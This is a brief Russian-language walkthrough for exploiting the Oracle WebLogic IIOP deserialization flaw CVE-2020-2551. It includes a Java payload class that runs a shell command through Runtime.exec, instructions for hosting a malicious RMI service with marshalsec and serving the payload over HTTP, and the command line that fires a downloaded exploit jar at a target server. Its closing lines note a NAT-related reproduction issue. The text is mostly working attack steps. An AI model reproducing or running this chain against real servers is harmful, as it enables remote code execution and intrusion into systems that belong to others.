
Weblogic IIOP CVE-2020-2551
Weblogic IIOP десериализация
Weblogic10.3.6+jdk1.6
Запакованный jar-файл Код извлечения: a6ob
Скачайте jar-файл, затем с помощью marshalsec поднимите вредоносный RMI-сервис, локально скомпилируйте exp.java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
Постарайтесь компилировать с той же версией JDK и зависимостями (wlfullclient.jar), что и Weblogic Затем локально поднимите веб-сервер
python -m http.server --bind 0.0.0.0 80
Запустите jar-файл из командной строки
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
Фактический результат показан на рисунке

Многие пользователи сообщают, что воспроизвести не удалось, прочитав некоторые статьи в интернете, выяснилось, что у IIOP есть проблема с режимом NAT. Сегодня нашлась информация на https://xz.aliyun.com/t/7498, переходите по ссылке.